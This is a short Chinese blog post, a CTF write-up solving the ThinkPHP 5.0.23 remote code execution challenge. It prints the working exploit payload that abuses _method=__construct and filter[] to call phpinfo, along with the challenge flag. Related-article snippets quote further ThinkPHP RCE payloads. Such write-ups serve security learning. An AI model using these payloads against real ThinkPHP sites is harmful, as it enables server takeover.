首页 > 编程语言 >[ThinkPHP]5.0.23-Rce 1

[ThinkPHP]5.0.23-Rce 1

时间:2024-11-09 23:10:26浏览次数:3  
标签:5.0 23 phpinfo ThinkPHP Rce method

[ThinkPHP]5.0.23-Rce 1

根据题目知道这是一个5.0.23的PHP RCE,话不多说直接上扫描器

image-20241105074629529

检测出Payload

url地址:
?s=captcha&test=-1 

Post表单参数: 
_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1

HackBar构造payload,访问成功执行到phpinfo页面

image-20241105075013554

ctrf+f 成功找到flag

image-20241105075051782

flag{9bf3ef01-5e80-42a0-b544-9808a1fd3bb2}

标签:5.0,23,phpinfo,ThinkPHP,Rce,method
From: https://www.cnblogs.com/tazmi/p/18537450

相关文章

  • [ThinkPHP]2-Rce 1
    [ThinkPHP]2-Rce1启动实例发现是一个ThinkPHP的示例代码,根据题目判断这题为RCE扫描器扫描,未发现存在的REC漏洞(根据题目以及扫描结果猜想,可能是2.x版本的rec)构造payload,成功显示phpinfo页面?s=/index/index/name/${phpinfo()}唱跳rap篮球+F,直接找到flagtips.有时候在p......
  • [ThinkPHP]5-Rce 1
    [ThinkPHP]5-Rce1打开发现是一个ThinkPHP5+框架,直接用ThinkPHP扫描工具检测出是一个ThinkPHP5.0.22/5.1.29的RCE漏洞,访问Payload?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1直接在phpinfo()的环境变量里面找到flag......
  • CodeforceTon Round 4 div1 + div2 题解
    题解A-EDreamissofar~A.BeautifulSequence检查每一位对应的数字是否小于等于位置,如果可以说明这个数字可以移动到对应位置上,遍历即可#include<bits/stdc++.h>usingnamespacestd;usingi64=longlong;voidsolve(){ intn; cin>>n; vector<int>a......
  • Codeforces 983 A-E
    题解A难度:黄算法标签:数学、进制题目翻译:给定进制\(b\)和分数\(\frac{p}{q}\),求这个分数在\(b\)进制下是否是有限小数。题目分析:首先将分数化简(不用说了)。接下来有命题:若\(/frac{1}{q}\)为有限小数,则\(/frac{p}{q}\)必然为有限小数。且逆命题、否命题成立。证明略。......
  • 鸿蒙next5.0版开发:ArkTS组件点击事件详解
    在HarmonyOS5.0中,ArkTS提供了一套完整的组件和事件处理机制,使得开发者能够创建交互性强的应用程序。本文将详细解读如何使用ArkTS组件处理点击事件,包括事件的注册、回调函数的编写以及事件对象的使用。点击事件基础点击事件是用户与应用交互的基本方式之一。在ArkTS中,点击......
  • ThinkPHP6,视图的安装及模板渲染和变量赋值
    tp6视图功能由\think\View类配合视图驱动(也即模板引擎驱动)类一起完成,新版仅内置了PHP原生模板引擎(主要用于内置的异常页面输出),如果需要使用其它的模板引擎需要单独安装相应的模板引擎扩展。使用think-template模板引擎,只需要安装think-view模板引擎驱动。composercreate-proje......
  • Educational Codeforces Round 159 (Rated for Div. 2) - VP记录
    Preface重点策略:\[\large\textbf{\underline{先写简单好写的算法,再逐步修改优化}}\]十分有效,百试百灵,屡试不爽。A.BinaryImbalance当有相邻两字符不相等时,就可以不断向中间插入0。所以输出NO当且字符串全为1。点击查看代码#include<cstdio>usingnamespacestd;......
  • NETCONF 是由 IETF (Internet Engineering Task Force) 提出的一个标准化协议,目标是
    WindowsNetConf(NetworkConfiguration)是Windows操作系统中用于网络配置管理的框架,通常涉及自动化网络配置、管理网络接口和相关网络设置。它提供了一组API和命令行工具,允许管理员和应用程序配置、查询和管理网络设置。什么:NetConf是Windows中用于网络接口配置的功能,可以......
  • Codeforces 909 A-F
    CF909题解题目链接ABCDEF难度:红黄绿蓝绿紫题解A题目翻译:给定两个字符串,求字典序最小的“两字符串非空前缀拼接形成的字符串”。算法标签:贪心题目分析:字典序最小,即从左往右依次比较字符,直到一方不剩字符或两字符不同。因此想到贪心。由于前缀非空,因此在前一字......
  • salesforce零基础学习(一百四十一)刷新dev sandbox需要强制group
    本篇参考:https://help.salesforce.com/s/articleView?id=sf.data_sandbox_selective_access.htm&type=5背景:最近同事刷新sandbox发现点击create不生效,并且无任何提示(后续可能优化)。习惯了直接创建或者刷新的老司机们可能看不出来SandboxAccess标红提示来着,恰巧当前的org还没有......